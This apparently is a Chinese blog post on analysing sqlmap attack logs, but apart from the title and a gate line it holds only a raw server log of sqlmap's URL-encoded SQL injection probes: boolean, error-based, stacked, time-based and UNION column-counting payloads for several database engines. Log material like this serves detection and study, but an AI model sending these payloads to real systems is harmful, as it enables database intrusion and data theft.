sqlmap 攻击日志分析及自动化解决想法

以下内容高危，如你知道密码，请输入

以下是我用sqlmap扫的日志，这是最简单的扫描记录

GET /?a=1 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=2904 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%22%28%27%27%28%22%28%27%29%28 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%208676%3D9977%20AND%20%289633%3D9633 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%203925%3D3925%20AND%20%289861%3D9861 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%20636%3D7258%20AND%20%285513%3D5513 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%204986%3D6711 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%203925%3D3925 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%203864%3D9683 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%20940%3D4505%20AND%20%28%27konc%27%3D%27konc HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%203925%3D3925%20AND%20%28%27FFCP%27%3D%27FFCP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%207381%3D1001%20AND%20%28%27OLcv%27%3D%27OLcv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%202327%3D9115%20AND%20%27Qlha%27%3D%27Qlha HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%203925%3D3925%20AND%20%27Wlgw%27%3D%27Wlgw HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%201192%3D5861%20AND%20%27mmuZ%27%3D%27mmuZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%20%28SELECT%208251%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C116%2C107%2C108%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288251%3D8251%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C102%2C112%2C117%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%287269%3D7269 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%20%28SELECT%208251%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C116%2C107%2C108%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288251%3D8251%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C102%2C112%2C117%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%20%28SELECT%208251%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C116%2C107%2C108%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288251%3D8251%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C102%2C112%2C117%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%28%27kalg%27%3D%27kalg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%20%28SELECT%208251%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C116%2C107%2C108%2C58%29%2C%28SELECT%20%28CASE%20WHEN%20%288251%3D8251%29%20THEN%201%20ELSE%200%20END%29%29%2CCHAR%2858%2C102%2C112%2C117%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%27bMbA%27%3D%27bMbA HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%203131%3DCAST%28CHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283131%3D3131%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%281279%3D1279 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%203131%3DCAST%28CHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283131%3D3131%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%203131%3DCAST%28CHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283131%3D3131%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27RfWr%27%3D%27RfWr HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%203131%3DCAST%28CHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283131%3D3131%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27uRAt%27%3D%27uRAt HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%205622%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28116%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285622%3D5622%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28112%29%2BCHAR%28117%29%2BCHAR%2858%29%29%29%20AND%20%283395%3D3395 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%205622%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28116%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285622%3D5622%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28112%29%2BCHAR%28117%29%2BCHAR%2858%29%29%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%205622%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28116%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285622%3D5622%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28112%29%2BCHAR%28117%29%2BCHAR%2858%29%29%29%20AND%20%28%27FJAP%27%3D%27FJAP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%205622%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28116%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285622%3D5622%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28112%29%2BCHAR%28117%29%2BCHAR%2858%29%29%29%20AND%20%27wdHo%27%3D%27wdHo HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%208421%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288421%3D8421%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%281009%3D1009 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%208421%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288421%3D8421%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%208421%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288421%3D8421%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27ytpV%27%3D%27ytpV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%208421%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28107%29%7C%7CCHR%28108%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288421%3D8421%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27KQDt%27%3D%27KQDt HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%3B%20SELECT%20SLEEP%285%29%3B--%20%20AND%20%287560%3D7560 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%3B%20SELECT%20SLEEP%285%29%3B-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%3B%20SELECT%20SLEEP%285%29%3B--%20%20AND%20%28%27AfMz%27%3D%27AfMz HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%3B%20SELECT%20SLEEP%285%29%3B--%20%20AND%20%27pIKO%27%3D%27pIKO HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%283641%3D3641 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%3B%20SELECT%20PG_SLEEP%285%29%3B-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%28%27mTPd%27%3D%27mTPd HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%3B%20SELECT%20PG_SLEEP%285%29%3B--%20AND%20%27lhez%27%3D%27lhez HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%285747%3D5747 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27iUug%27%3D%27iUug HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27oGtV%27%3D%27oGtV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%20SLEEP%285%29%20AND%20%283924%3D3924 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%20SLEEP%285%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%20SLEEP%285%29%20AND%20%28%27vnCj%27%3D%27vnCj HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%20SLEEP%285%29%20AND%20%27xHdS%27%3D%27xHdS HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%20851%3D%28SELECT%20851%20FROM%20PG_SLEEP%285%29%29%20AND%20%287626%3D7626 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%20851%3D%28SELECT%20851%20FROM%20PG_SLEEP%285%29%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%20851%3D%28SELECT%20851%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27vrAE%27%3D%27vrAE HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%20851%3D%28SELECT%20851%20FROM%20PG_SLEEP%285%29%29%20AND%20%27VcUg%27%3D%27VcUg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%283376%3D3376 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27cMqq%27%3D%27cMqq HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27QQdM%27%3D%27QQdM HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20AND%207586%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2897%29%7C%7CCHR%28104%29%7C%7CCHR%28110%29%2C5%29%20AND%20%284545%3D4545 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20AND%207586%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2897%29%7C%7CCHR%28104%29%7C%7CCHR%28110%29%2C5%29 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20AND%207586%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2897%29%7C%7CCHR%28104%29%7C%7CCHR%28110%29%2C5%29%20AND%20%28%27JNkT%27%3D%27JNkT HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20AND%207586%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2897%29%7C%7CCHR%28104%29%7C%7CCHR%28110%29%2C5%29%20AND%20%27YxKy%27%3D%27YxKy HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28771%3D771 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%282265%3D2265 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286668%3D6668 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%283039%3D3039 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287237%3D7237 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281361%3D1361 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%287315%3D7315 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286174%3D6174 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285136%3D5136 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%282494%3D2494 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%28%27nymA%27%3D%27nymA HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%28%27ijmk%27%3D%27ijmk HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27oFxP%27%3D%27oFxP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27CWYo%27%3D%27CWYo HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27lxqZ%27%3D%27lxqZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27DWNP%27%3D%27DWNP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27byrs%27%3D%27byrs HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27KEvQ%27%3D%27KEvQ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27OLyg%27%3D%27OLyg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27TOsV%27%3D%27TOsV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%27mDCu%27%3D%27mDCu HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%27VTxz%27%3D%27VTxz HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27YmTa%27%3D%27YmTa HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27MMix%27%3D%27MMix HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27bXGh%27%3D%27bXGh HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27DuTO%27%3D%27DuTO HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27JVBX%27%3D%27JVBX HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xxHC%27%3D%27xxHC HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zReF%27%3D%27zReF HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27iOvN%27%3D%27iOvN HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL--%20AND%20%282876%3D2876 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20AND%20%284969%3D4969 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20AND%20%281601%3D1601 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%285858%3D5858 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%2867%3D67 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%286756%3D6756 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%283876%3D3876 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%281001%3D1001 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%287414%3D7414 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28767%3D767 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
